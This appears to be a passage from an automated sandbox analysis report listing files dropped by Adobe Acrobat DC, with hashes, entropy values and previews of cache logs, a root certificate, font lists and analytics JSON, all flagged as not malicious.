                                              Entropy (8bit):5.236319907358879
                                              Encrypted:false
                                              SSDEEP:6:iOH1iLih+q2Pwkn2nKuAl9OmbzNMxIFUtt1iLNXZmwD1iLshVkwOwkn2nKuAl9Ob:71svYfHAa8jFUtiX//5JfHAa84J
                                              MD5:AD1E62AAB1B0D3E989650472B20BBA6C
                                              SHA1:7EF8A30D4072883A8BEE21E05CE99158253184AA
                                              SHA-256:25277756F73945231DCA2216EBDC66A8DEB40029D091E1D803471F0594F367C9
                                              SHA-512:94A75CFAE2B03AD402D84A0CA429405C04D3D79C5E97C546467CD059AA9104E71F8562A17106D8E44253B4FC1BCBD514676A6267B02E358B4B45E3799904B393
                                              Malicious:false
                                              Preview:2025/01/05-04:44:03.656 1d98 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/05-04:44:03.657 1d98 Recovering log #3.2025/01/05-04:44:03.658 1d98 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):324
                                              Entropy (8bit):5.236319907358879
                                              Encrypted:false
                                              SSDEEP:6:iOH1iLih+q2Pwkn2nKuAl9OmbzNMxIFUtt1iLNXZmwD1iLshVkwOwkn2nKuAl9Ob:71svYfHAa8jFUtiX//5JfHAa84J
                                              MD5:AD1E62AAB1B0D3E989650472B20BBA6C
                                              SHA1:7EF8A30D4072883A8BEE21E05CE99158253184AA
                                              SHA-256:25277756F73945231DCA2216EBDC66A8DEB40029D091E1D803471F0594F367C9
                                              SHA-512:94A75CFAE2B03AD402D84A0CA429405C04D3D79C5E97C546467CD059AA9104E71F8562A17106D8E44253B4FC1BCBD514676A6267B02E358B4B45E3799904B393
                                              Malicious:false
                                              Preview:2025/01/05-04:44:03.656 1d98 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/05-04:44:03.657 1d98 Recovering log #3.2025/01/05-04:44:03.658 1d98 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                              Category:dropped
                                              Size (bytes):65110
                                              Entropy (8bit):1.509136818917381
                                              Encrypted:false
                                              SSDEEP:192:wwlGGq1dW6NCa1OPqelE1ts+auKoWAAO3FElU4b+BypmLw:wwUGq1dW6n1OCelE1tsluK+AjH
                                              MD5:EDD209DE2EDD7F26F87A3485484C2978
                                              SHA1:946CB732908578FCDAA4900B6D85BB5268C854C0
                                              SHA-256:BD4394D6C254AD60BB20FC6F8EDFBB256E7131F0CAB9CAED9C9D0E6284ABCF8C
                                              SHA-512:DF9E3FE8C672011478416A35C740AC1C7FF3BF80D7AE760519162C2F211D4576591907872A20E598D73CAE7C888A4CBFF19615D610BF09BBF24C61C2C1FD4CAA
                                              Malicious:false
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 17
                                              Category:dropped
                                              Size (bytes):86016
                                              Entropy (8bit):4.445217613608404
                                              Encrypted:false
                                              SSDEEP:384:SeHci5t2iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:/5s3OazzU89UTTgUL
                                              MD5:89F4A5350D8DA0E1F819D14C7DF93E87
                                              SHA1:8FF713707E21A2C2F01300BC8511CF60D6733AE9
                                              SHA-256:F7001B899CC900928CF9807EAB1C6CF3F4BFD951041D63F68F458BE71CE9E63A
                                              SHA-512:C2D0C359A57A3C5E55C53AA861AF0FC9A2C93974D40A13B0E8F8D5C5AA60D101374E0836152AF5D3A3B8DB30C968A28565C35B21D36200EFC4FDFE99861DDC59
                                              Malicious:false
                                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:SQLite Rollback Journal
                                              Category:dropped
                                              Size (bytes):8720
                                              Entropy (8bit):2.214354338041627
                                              Encrypted:false
                                              SSDEEP:24:7+tr/94nuwKCfqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmQ:7MjenC+qvmFTIF3XmHjBoGGR+jMz+Lhg
                                              MD5:01CE7323EDF5F86E105BC25CC6C8BA83
                                              SHA1:B66CBBB1595787441DD2FA066CDC05AFFBDA79B9
                                              SHA-256:8F902C3E0890DDDB62B3E5277D731D4D7B82FDE4107A9663052DAAD122B8E9AD
                                              SHA-512:8A8FAB5DCD9E9286B34E38BBBA5BAE22CF60F530D56E70C95E424063D00CC9AA7FF358547F065C27B12319AF3022F336FB47C2C9CCA1B2DF7C58C6F28C211920
                                              Malicious:false
                                              Preview:.... .c.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:Certificate, Version=3
                                              Category:dropped
                                              Size (bytes):1391
                                              Entropy (8bit):7.705940075877404
                                              Encrypted:false
                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                              Malicious:false
                                              Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):192
                                              Entropy (8bit):2.7673182398396405
                                              Encrypted:false
                                              SSDEEP:3:kkFklKtrfllXlE/HT8ktl1NNX8RolJuRdxLlGB9lQRYwpDdt:kKTtkT80VNMa8RdWBwRd
                                              MD5:0454815D4013102FBD387830D8F97813
                                              SHA1:A7923935847B37042306416038E868DE8D027B63
                                              SHA-256:861247D6CDEF6557A872C9B10A9A8A59CAE83ECF0D4EF449F7704EC57073FA40
                                              SHA-512:E753F93A12095EECE2A059D5CF7E9CECC5BC0DC8C6F95024A23536C3A2D3046418020AD04B489CE26B19AC24FEF00CC57403E0444B40FF0B3208263E7EBA128C
                                              Malicious:false
                                              Preview:p...... .........HGbV_..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PostScript document text
                                              Category:dropped
                                              Size (bytes):1233
                                              Entropy (8bit):5.233980037532449
                                              Encrypted:false
                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                              Malicious:false
                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PostScript document text
                                              Category:dropped
                                              Size (bytes):1233
                                              Entropy (8bit):5.233980037532449
                                              Encrypted:false
                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                              Malicious:false
                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PostScript document text
                                              Category:dropped
                                              Size (bytes):1233
                                              Entropy (8bit):5.233980037532449
                                              Encrypted:false
                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                              Malicious:false
                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PostScript document text
                                              Category:dropped
                                              Size (bytes):10880
                                              Entropy (8bit):5.214360287289079
                                              Encrypted:false
                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                              Malicious:false
                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PostScript document text
                                              Category:dropped
                                              Size (bytes):10880
                                              Entropy (8bit):5.214360287289079
                                              Encrypted:false
                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                              Malicious:false
                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):295
                                              Entropy (8bit):5.370588179406839
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJM3g98kUwPeUkwRe9:YvXKXFJuWkZc0vjGMbLUkee9
                                              MD5:C586C47E378C2F92FF68B26F9F6D9157
                                              SHA1:D46E6C1229C75DDD40B75D4902E6DE1F76A4A7D5
                                              SHA-256:2FA66F20895CC2C3785735BCB01AEB2E64D49EB43F25903E8D144EB2AEE77D34
                                              SHA-512:B8537A1DB3F7D44CBD99D934CBA44ECA26AC42EF374296B1ED427B76631F4237090758D54051EB7EBD19D8DB6819DC3DE42C829ADB4447E867DF20FF8C13EBF4
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):294
                                              Entropy (8bit):5.321825469500053
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfBoTfXpnrPeUkwRe9:YvXKXFJuWkZc0vjGWTfXcUkee9
                                              MD5:4B750D97184584D543E9CB067DF8612A
                                              SHA1:1344B77BAA1F6E7410C397D25FE76D005EE431C9
                                              SHA-256:79ED385449AC217B61B1FE9B7D5461FA979E72FAFF892FC1CD8078A8693EA803
                                              SHA-512:DBF2280BCE5DB6ABA80CB880A0DFDBE76FDBB5E2AF6B1C4C74AE4A187E9486659BEB6DB9FE25C25379FD17B1A87C643B86513E12637068CA62EE2CE539CD77C9
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):294
                                              Entropy (8bit):5.300224788368483
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfBD2G6UpnrPeUkwRe9:YvXKXFJuWkZc0vjGR22cUkee9
                                              MD5:7C752750ADFBF76550E31EC8C37FBE0B
                                              SHA1:5106DDCBB87C2CA039502EAA4DCF96E3757D246A
                                              SHA-256:B2FCD422D692F8788AD01C0547F2DFAAA531F668D33D5DC07B602F1734F04D9D
                                              SHA-512:21A66F300C270A4C4EA23F4BB10FE5F1A9DFBE1708CCD54EED775B71B936A2B5D0D089563DD53D7452F016618209214F1526E09F16CAA607ECC34F6520C87ACF
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):285
                                              Entropy (8bit):5.357852187113916
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfPmwrPeUkwRe9:YvXKXFJuWkZc0vjGH56Ukee9
                                              MD5:78AF5C279973F5CDD669699EDF6275A1
                                              SHA1:B61582B5B752F583509A441B2829E62A22667B37
                                              SHA-256:F9CDCBC0D06E6DA4D678DD97430A08B742BC1589DC79452E20019D02F31B8059
                                              SHA-512:EC9F056F3856C67C7755EE021838AC54242CA50CB8E03E170EE4FF5C727992F6A70BF71809BDA85BFE5C70944E0619540257A7422CD2445718CD05446890729C
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):1123
                                              Entropy (8bit):5.6888550626998
                                              Encrypted:false
                                              SSDEEP:24:Yv6XPunzv4pLgE9cQx8LennAvzBvkn0RCmK8czOCCS2:YvUYwhgy6SAFv5Ah8cv/2
                                              MD5:65C98FC0D24FF65D99D0A1B63A7D17B0
                                              SHA1:20369738B5DFB0DD89A86A7EDBEA5A3945F5E5B0
                                              SHA-256:FF208406C111EEB5E39209A0ED95BCAD99330C712D4F81015A6329512ACC4CD4
                                              SHA-512:CFDF8559F97CCDDC713C19B4847970A5F2F0A514C89AD1498EC882AF6DCFA3FB97C736E2E512DB1A7653DC002AF3355077C1035412A6CE38837016DA804CB7F6
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):289
                                              Entropy (8bit):5.3038900422253965
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJf8dPeUkwRe9:YvXKXFJuWkZc0vjGU8Ukee9
                                              MD5:D6F9D0E0FC0C51B09FCF03DF00F37B2E
                                              SHA1:F59AF2A12EC399343103EBB517CB994E94790523
                                              SHA-256:4DA32A23CE3BFA1DBD8DEF469FE1B233420530B43625640A6EF2BA8DC7255431
                                              SHA-512:E3119A88B846A07FEC3BEB9A7CB10835296E0BFDFA27670F98ADA59C614F212AFA60727789386786B9BF2AD43B63815CF6D6D88FB6E8E08F8DEE66522B885716
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):292
                                              Entropy (8bit):5.30891593456332
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfQ1rPeUkwRe9:YvXKXFJuWkZc0vjGY16Ukee9
                                              MD5:E0FBD494AD3183857329DBA87B372EA7
                                              SHA1:D74A17B68F41634CB8BE43D8059084A61326644D
                                              SHA-256:605CAF064CBA98D17A2DC17311CCDD87A0C858A37BDD59BFD177248E23D43792
                                              SHA-512:2A57D1079BB762A4D43BB80DBC36A851B1272C8FD977C62CA8940FDC217A9894A2AC670280DCA029837D8715FCB483D5E29672DE17F0E688862C734C39957F26
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):289
                                              Entropy (8bit):5.3118571891186885
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfFldPeUkwRe9:YvXKXFJuWkZc0vjGz8Ukee9
                                              MD5:AC87AF9DF534AD75EA79FE4250EE0A62
                                              SHA1:D38B1CE3F047AFF7BA1C6E0A86A695E1BAEE19C9
                                              SHA-256:336FE13BBFFEAD171B149BF16F4CE59AED3C1483DB5847DC9CFCCFC9D68143E8
                                              SHA-512:B00756A8D8B3A53BAA0A71A4E4D53C41E29FEA6C102B4386F5C685B71647793A50EF28DE98B743423C074B034E729CE331C12BD02FD6EB4B155C9BF6AF6C40A2
                                              Malicious:false
                                              Preview:{"analyticsData":{"responseGUID":"2a717a2a-d3ac-492d-99fd-55bb89f52318","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736245510592,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):295
                                              Entropy (8bit):5.328904546985018
                                              Encrypted:false
                                              SSDEEP:6:YEQXJ2HXFkOutfQdVoZcg1vRcR0YXoAvJfzdPeUkwRe9:YvXKXFJuWkZc0vjGb8Ukee9
                                              MD5:F5D30EFC3C84E6E95885C5E80FA2C806
                                              SHA1:C645B660ABC2FB231A7139428AC60A8CCBAEF846
